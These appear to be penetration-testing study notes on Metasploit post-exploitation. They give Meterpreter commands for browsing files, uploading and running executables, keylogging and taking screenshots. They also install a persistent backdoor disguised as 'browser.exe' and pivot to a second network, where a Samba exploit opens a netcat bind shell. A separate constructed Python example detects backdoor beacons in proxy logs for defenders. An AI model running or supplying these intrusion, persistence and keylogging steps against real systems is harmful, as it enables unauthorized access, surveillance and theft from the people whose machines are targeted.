
Post Exploitation

  • Assuming that one already has access to the target computer through Metasploit, we can run multiple commands in Meterpreter:

```
#inside meterpreter session currently
help #shows help manual
background #backgrounds current session
sessions -l #lists all current sessions
sessions -i 4 #to interact with a particular session
sysinfo #shows info about target computer
ipconfig #shows all interfaces connected to target computer
ps #shows all running processes
migrate 4376 #migrates meterpreter from current PID (backdoor) to a new PID (e.g. explorer.exe)
pwd #get current working directory
ls #list all files and directories
#cd can be used to switch directories
cat test.txt #read contents of file
download test.txt #download file
upload car-image.exe #upload file
execute -f car-image.exe #execute file
shell #opens Windows Shell to run Windows commands
```
  • Using Metasploit and Veil-Evasion together has proven to be more robust and harder to detect:

```
#inside metasploit currently
use exploit/windows/local/persistence #to use persistence module
show options
set EXE_NAME browser.exe
set SESSION 4
show advanced #advanced options
set EXE::Custom /var/www/html/evil-files/rev_https_8080.exe
exploit
#the resource file given can be used to clean up, if you do not want to run the backdoor file anymore
sessions -K #kills all sessions
use exploit/multi/handler #listen for incoming connections
show options
exploit #this works now even if the target computer is restarted, because the backdoor now persists on it
```
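A defender-side check, added here as an example that is not part of these notes: a persistent backdoor like the one above reconnects to its handler after every reboot and, assuming (as is common for reverse-HTTPS payloads) that it retries at a roughly fixed interval, shows up in proxy or firewall logs as regular callbacks to one destination and port. The log lines, field names and addresses below are constructed; the 8080 port mirrors the reverse-HTTPS listener named above.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy/firewall log lines (not from the original page):
# one workstation calling back to a listener on TCP/8080 at a nearly fixed
# interval, mixed with ordinary browsing to a second host.
SAMPLE_LOG = """\
2024-05-01T09:00:00 src=10.0.2.15 dst=203.0.113.7 dport=8080 proto=tcp
2024-05-01T09:00:01 src=10.0.2.15 dst=198.51.100.20 dport=443 proto=tcp
2024-05-01T09:01:00 src=10.0.2.15 dst=203.0.113.7 dport=8080 proto=tcp
2024-05-01T09:02:01 src=10.0.2.15 dst=203.0.113.7 dport=8080 proto=tcp
2024-05-01T09:02:30 src=10.0.2.15 dst=198.51.100.20 dport=443 proto=tcp
2024-05-01T09:03:00 src=10.0.2.15 dst=203.0.113.7 dport=8080 proto=tcp
2024-05-01T09:04:00 src=10.0.2.15 dst=203.0.113.7 dport=8080 proto=tcp
2024-05-01T09:11:00 src=10.0.2.15 dst=198.51.100.20 dport=443 proto=tcp
"""

LINE_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+) proto=\S+$")

def parse(log_text):
    """Group connection timestamps by (src, dst, dport) flow key."""
    flows = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        ts, src, dst, dport = m.groups()
        flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return flows

def find_beacons(log_text, min_hits=4, max_jitter=0.2):
    """Return {flow: mean period in seconds} for flows whose gaps between
    connections are nearly constant (stdev/mean <= max_jitter)."""
    suspects = {}
    for key, times in parse(log_text).items():
        if len(times) < min_hits:
            continue  # too few connections to call it periodic
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            suspects[key] = round(avg, 1)
    return suspects

if __name__ == "__main__":
    for (src, dst, dport), period in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}:{dport} beacons every ~{period}s")
```

On the sample above only the 8080 flow is reported; the browsing to port 443 has too few, irregular connections. Tune `min_hits` and `max_jitter` to the retry behaviour you expect to see.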
  • Spying on the target computer:

```
#inside meterpreter session currently
keyscan_start #start module to capture keystrokes
keyscan_dump #shows log of keystrokes
keyscan_stop #stop sniffer
screenshot #takes a screenshot
```
  • Pivoting uses the device that we already compromised to reach other devices that only this device has access to:

```
#inside Metasploit currently, with a Windows machine compromised
background #background current Windows session
use post/multi/manage/autoroute #autoroute module for pivoting
show options
set SESSION 1 #Windows session ID is 1
set SUBNET 10.20.15.0 #subnet of the Metasploitable machine, which is connected to Windows but not to Kali
exploit #creates route
use exploit/multi/samba/usermap_script #exploit for Metasploitable
show options
set RHOSTS 10.0.2.5
show payloads
set PAYLOAD cmd/unix/bind_netcat
exploit #to access Metasploitable
```